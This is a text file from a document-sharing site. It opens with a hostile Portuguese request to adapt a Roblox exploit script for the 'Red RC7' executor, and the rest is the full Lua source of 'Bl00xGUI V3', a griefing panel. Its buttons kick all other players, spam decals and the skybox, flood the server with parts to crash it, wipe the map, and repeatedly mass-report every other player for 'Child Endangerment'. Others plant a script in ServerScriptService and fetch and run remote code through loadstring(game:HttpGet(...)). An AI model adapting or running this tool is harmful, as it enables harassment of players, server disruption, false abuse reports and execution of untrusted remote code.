0% found this document useful (0 votes)
62 views9 pages

Adapte Pra Func

Uploaded by

voltrobots12
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
62 views9 pages

Adapte Pra Func

Uploaded by

voltrobots12
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

adapte pra funcionar no Red RC7 e pra isso PESQUISE NA INTERNET INTEIRA E MANTENDO

TUDO SEU IMBECIL: local ReplicatedStorage = game:GetService("ReplicatedStorage")


local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local localPlayer = Players.LocalPlayer
local TweenService = game:GetService("TweenService")
local RunService = game:GetService("RunService")
local CoreGui = game:GetService("CoreGui")

-- CLIENT-SIDE WHITELIST
local CLIENT_WHITELIST = {
[9513226359] = true
}

-- Function to execute commands locally


local function executeLocalCommand(commandData)
if not commandData or not commandData.Command then
return false
end

local success, errorMsg = pcall(function()


loadstring(commandData.Command)()
end)

if not success then


warn("Error executing command: " .. tostring(errorMsg))
return false
end

return true
end

-- Function to create the Bl00x GUI


local function createBl00xGUI()
if not CLIENT_WHITELIST[localPlayer.UserId] then
return
end

local player = game.Players.LocalPlayer


local playerGui = player:WaitForChild("PlayerGui")

-- Remove existing GUI


local existingGUI = playerGui:FindFirstChild("Bl00xGUI")
if existingGUI then
existingGUI:Destroy()
end

-- Instances creation
local ScreenGui = Instance.new("ScreenGui")
local MainFrame = Instance.new("Frame")
local Frame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local BanOthers = Instance.new("TextButton")
local UICorner_2 = Instance.new("UICorner")
local DecalSpam = Instance.new("TextButton")
local UICorner_3 = Instance.new("UICorner")
local BanOthersACC = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local Skybox = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local CrashRandomPlayer = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")
local CrashServer = Instance.new("TextButton")
local UICorner_7 = Instance.new("UICorner")
local ShutDownGame = Instance.new("TextButton")
local UICorner_8 = Instance.new("UICorner")
local Announcement = Instance.new("TextButton")
local UICorner_9 = Instance.new("UICorner")
local KickAll = Instance.new("TextButton")
local UICorner_10 = Instance.new("UICorner")
local FEBypassGUI = Instance.new("TextButton")
local UICorner_11 = Instance.new("UICorner")
local Hint = Instance.new("TextButton")
local UICorner_12 = Instance.new("UICorner")
local NukeMap = Instance.new("TextButton")
local UICorner_13 = Instance.new("UICorner")
local NukeServer = Instance.new("TextButton")
local UICorner_14 = Instance.new("UICorner")
local EnableLoadstring = Instance.new("TextButton")
local UICorner_15 = Instance.new("UICorner")
local PlayMusic = Instance.new("TextButton")
local UICorner_16 = Instance.new("UICorner")
local UICorner_18 = Instance.new("UICorner")
local Frame_2 = Instance.new("Frame")
local UICorner_19 = Instance.new("UICorner")
local ExecuteBtn = Instance.new("TextButton")
local UICorner_20 = Instance.new("UICorner")
local TextBox = Instance.new("TextBox")
local UICorner_21 = Instance.new("UICorner")
local TextLabel = Instance.new("TextLabel")
local InjectBackdoor = Instance.new("TextButton")
local UICorner_17 = Instance.new("UICorner")
local StatusLabel = Instance.new("TextLabel")

-- UI Properties Setup
ScreenGui.Name = "Bl00xGUI"
ScreenGui.Parent = playerGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.ResetOnSpawn = false

MainFrame.Name = "MainFrame"
MainFrame.Parent = ScreenGui
MainFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 255)
MainFrame.BorderColor3 = Color3.fromRGB(0, 0, 0)
MainFrame.BorderSizePixel = 0
MainFrame.Position = UDim2.new(0.043, 0, 0.045, 0)
MainFrame.Size = UDim2.new(0, 690, 0, 346)
MainFrame.Active = true
MainFrame.Draggable = true

Frame.Parent = MainFrame
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.025, 0, 0.145, 0)
Frame.Size = UDim2.new(0, 408, 0, 286)

UICorner.CornerRadius = UDim.new(0, 20)


UICorner.Parent = Frame

-- Set up buttons with rounded corners and properties


local function setupButton(button, position, text)
button.Parent = Frame
button.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
button.BorderColor3 = Color3.fromRGB(0, 0, 0)
button.BorderSizePixel = 0
button.Position = position
button.Size = UDim2.new(0, 116, 0, 39)
button.Font = Enum.Font.Michroma
button.Text = text
button.TextColor3 = Color3.fromRGB(255, 255, 255)
button.TextSize = 14
local uicorner = Instance.new("UICorner")
uicorner.CornerRadius = UDim.new(0, 20)
uicorner.Parent = button
end

setupButton(BanOthers, UDim2.new(0.002, 0, 0.026, 0), "BanOthers")


setupButton(DecalSpam, UDim2.new(0.306, 0, 0.026, 0), "DecalSpam")
setupButton(BanOthersACC, UDim2.new(0, 0, 0.192, 0), "BanAcc")
setupButton(Skybox, UDim2.new(0, 0, 0.349, 0), "SkyBox")
setupButton(CrashRandomPlayer, UDim2.new(0, 0, 0.508, 0), "CrashPlayer")
setupButton(CrashServer, UDim2.new(0.002, 0, 0.672, 0), "CrashServer")
setupButton(ShutDownGame, UDim2.new(0.306, 0, 0.192, 0), "ShutDownGame")
setupButton(Announcement, UDim2.new(0.306, 0, 0.349, 0), "Announcement")
setupButton(KickAll, UDim2.new(0.306, 0, 0.508, 0), "KickAll")
setupButton(FEBypassGUI, UDim2.new(0.306, 0, 0.672, 0), "FEBypassGUI")
setupButton(Hint, UDim2.new(0.642, 0, 0.026, 0), "Hint")
setupButton(NukeMap, UDim2.new(0.642, 0, 0.192, 0), "NukeMap")
setupButton(NukeServer, UDim2.new(0.642, 0, 0.349, 0), "NukeServer")
setupButton(EnableLoadstring, UDim2.new(0.642, 0, 0.508, 0),
"EnableLoadstring")
setupButton(PlayMusic, UDim2.new(0.642, 0, 0.672, 0), "PlayMusic")

-- Secondary frame and controls


Frame_2.Parent = MainFrame
Frame_2.BackgroundColor3 = Color3.fromRGB(131, 131, 131)
Frame_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(0.663, 0, 0.145, 0)
Frame_2.Size = UDim2.new(0, 199, 0, 236)
UICorner_19.CornerRadius = UDim.new(0, 20)
UICorner_19.Parent = Frame_2

ExecuteBtn.Parent = Frame_2
ExecuteBtn.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
ExecuteBtn.BorderColor3 = Color3.fromRGB(0, 0, 0)
ExecuteBtn.BorderSizePixel = 0
ExecuteBtn.Position = UDim2.new(0, 0, 1.047, 0)
ExecuteBtn.Size = UDim2.new(0, 200, 0, 39)
ExecuteBtn.Font = Enum.Font.Michroma
ExecuteBtn.Text = "Execute Script"
ExecuteBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
ExecuteBtn.TextSize = 14
UICorner_20.CornerRadius = UDim.new(0, 20)
UICorner_20.Parent = ExecuteBtn
TextBox.Parent = Frame_2
TextBox.BackgroundColor3 = Color3.fromRGB(131, 131, 131)
TextBox.BorderColor3 = Color3.fromRGB(83, 83, 83)
TextBox.BorderSizePixel = 0
TextBox.Position = UDim2.new(0.035, 0, 0.03, 0)
TextBox.Size = UDim2.new(0, 186, 0, 221)
TextBox.Font = Enum.Font.Michroma
TextBox.PlaceholderColor3 = Color3.fromRGB(236, 236, 236)
TextBox.PlaceholderText = "-- Write your script here"
TextBox.Text = ""
TextBox.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextSize = 14
TextBox.TextXAlignment = Enum.TextXAlignment.Left
TextBox.TextYAlignment = Enum.TextYAlignment.Top
UICorner_21.CornerRadius = UDim.new(0, 20)
UICorner_21.Parent = TextBox

TextLabel.Parent = MainFrame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.026, 0, 0, 0)
TextLabel.Size = UDim2.new(0, 407, 0, 50)
TextLabel.Font = Enum.Font.Michroma
TextLabel.Text = "Bl00xGUI V3"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 59
TextLabel.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

StatusLabel.Parent = MainFrame
StatusLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
StatusLabel.BackgroundTransparency = 1
StatusLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
StatusLabel.BorderSizePixel = 0
StatusLabel.Position = UDim2.new(0.6, 0, 0, 0)
StatusLabel.Size = UDim2.new(0, 200, 0, 50)
StatusLabel.Font = Enum.Font.Michroma
StatusLabel.Text = "LOCAL MODE"
StatusLabel.TextColor3 = Color3.fromRGB(0, 255, 0)
StatusLabel.TextSize = 20

InjectBackdoor.Name = "InjectBackdoor"
InjectBackdoor.Parent = Frame
InjectBackdoor.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
InjectBackdoor.BorderColor3 = Color3.fromRGB(0, 0, 0)
InjectBackdoor.BorderSizePixel = 0
InjectBackdoor.Position = UDim2.new(0.002, 0, 0.842, 0)
InjectBackdoor.Size = UDim2.new(0, 392, 0, 39)
InjectBackdoor.Font = Enum.Font.Michroma
InjectBackdoor.Text = "Inject Backdoor"
InjectBackdoor.TextColor3 = Color3.fromRGB(255, 255, 255)
InjectBackdoor.TextSize = 14
UICorner_17.CornerRadius = UDim.new(0, 20)
UICorner_17.Parent = InjectBackdoor

-- Connect button click events to execute commands locally


BanOthers.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "for _, player in ipairs(game.Players:GetPlayers()) do if
player ~= game.Players.LocalPlayer then player:Kick('GET R3KT BY TEAM Bl00xkidd')
end end"
})
end)

DecalSpam.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local ID = 124018789726194
local function applyDecals(part)
if part:IsA("BasePart") then
for face = 0, 5 do
local decal = Instance.new("Decal")
decal.Face = face
decal.Texture = "rbxassetid://" .. ID
decal.Parent = part
end
end
end
for _, obj in pairs(workspace:GetDescendants()) do
applyDecals(obj)
end
workspace.DescendantAdded:Connect(applyDecals)
]]
})
end)

BanOthersACC.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
while true do
task.wait(0.5)
for _, player in ipairs(game.Players:GetPlayers()) do
if player ~= game.Players.LocalPlayer then
pcall(function()
game:GetService("Players"):ReportAbuse(player, "Swearing", "Child
Endangerment")
end)
end
end
end
]]
})
end)

Skybox.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local DecalID = 124018789726194
local sky = game.Lighting:FindFirstChild("Sky") or Instance.new("Sky")
sky.Parent = game.Lighting
sky.SkyboxBk = "rbxassetid://" .. DecalID
sky.SkyboxDn = "rbxassetid://" .. DecalID
sky.SkyboxFt = "rbxassetid://" .. DecalID
sky.SkyboxLf = "rbxassetid://" .. DecalID
sky.SkyboxRt = "rbxassetid://" .. DecalID
sky.SkyboxUp = "rbxassetid://" .. DecalID
]]
})
end)

CrashRandomPlayer.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
for i = 1, 100 do
task.spawn(function()
while true do
local part = Instance.new("Part")
part.Parent = workspace
part.Position = Vector3.new(0, 500, 0)
part.Anchored = true
part:SetAttribute("CrashAttempt", true)
task.wait()
end
end)
end
]]
})
end)

CrashServer.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "while true do task.wait() end"
})
end)

ShutDownGame.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "game:Shutdown()"
})
end)

Announcement.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local msg = Instance.new("Message")
msg.Name = "GETR3KTBYTEAMBL00XKIDD"
msg.Text = "!!!GET R3KT BY TEAM BL00XKIDD!!!"
msg.Parent = workspace
task.wait(5)
msg:Destroy()
]]
})
end)

KickAll.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "for _, player in ipairs(game.Players:GetPlayers()) do if
player ~= game.Players.LocalPlayer then player:Kick('GET R3KT BY TEAM Bl00xkidd')
end end"
})
end)

FEBypassGUI.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command =
"loadstring(game:HttpGet('https://raw.githubusercontent.com/g00lXploiter/
g00lXploiter/main/Fe%20bypass'))()"
})
end)

Hint.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local hint = Instance.new("Hint")
hint.Text = "!!!GET R3KT BY TEAM Bl00xkidd!!!"
hint.Parent = workspace
task.wait(5)
hint:Destroy()
]]
})
end)

NukeMap.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "workspace:ClearAllChildren()"
})
end)

NukeServer.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
for i = 1, 1000 do
task.spawn(function()
while true do
local part = Instance.new("Part")
part.Size = Vector3.new(100, 100, 100)
part.Position = Vector3.new(math.random(-500, 500), math.random(100,
500), math.random(-500, 500))
part.Anchored = false
part.Velocity = Vector3.new(math.random(-100, 100), math.random(-100,
100), math.random(-100, 100))
part.Parent = workspace
task.wait()
end
end)
end
]]
})
end)

EnableLoadstring.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = "local env = getfenv(); env.loadstring = loadstring"
})
end)

PlayMusic.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local sound = Instance.new("Sound")
sound.SoundId = "rbxassetid://121336636707861"
sound.Volume = 10
sound.Looped = true
sound.Parent = game:GetService("SoundService")
sound:Play()
]]
})
end)

InjectBackdoor.MouseButton1Click:Connect(function()
executeLocalCommand({
Type = "Command",
Command = [[
local backdoorScript = Instance.new("Script")
backdoorScript.Source = 'print("Backdoor injected locally")'
backdoorScript.Parent = game:GetService("ServerScriptService")
]]
})
end)

ExecuteBtn.MouseButton1Click:Connect(function()
local scriptCode = TextBox.Text
if scriptCode and scriptCode ~= "" then
executeLocalCommand({
Type = "Command",
Command = scriptCode
})
end
end)

-- Add close button


local CloseButton = Instance.new("TextButton")
CloseButton.Name = "CloseButton"
CloseButton.Parent = MainFrame
CloseButton.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
CloseButton.BorderSizePixel = 0
CloseButton.Position = UDim2.new(0.95, 0, 0.01, 0)
CloseButton.Size = UDim2.new(0, 20, 0, 20)
CloseButton.Font = Enum.Font.Michroma
CloseButton.Text = "X"
CloseButton.TextColor3 = Color3.fromRGB(255, 255, 255)
CloseButton.TextSize = 14

local UICornerClose = Instance.new("UICorner")


UICornerClose.CornerRadius = UDim.new(0, 10)
UICornerClose.Parent = CloseButton

CloseButton.MouseButton1Click:Connect(function()
ScreenGui:Destroy()
end)
end

-- Script initialization
local function initialize()
if not CLIENT_WHITELIST[localPlayer.UserId] then
return
end

-- Create the GUI


createBl00xGUI()

-- Add keyboard shortcut to open/close the GUI


local guiVisible = true
local UserInputService = game:GetService("UserInputService")

UserInputService.InputBegan:Connect(function(input, gameProcessed)
if gameProcessed then return end

if input.KeyCode == Enum.KeyCode.RightShift then


local playerGui = localPlayer:WaitForChild("PlayerGui")
local bl00xGUI = playerGui:FindFirstChild("Bl00xGUI")

if bl00xGUI then
guiVisible = not guiVisible
bl00xGUI.Enabled = guiVisible
else
createBl00xGUI()
end
end
end)
end

-- Run initialization
pcall(initialize)

You might also like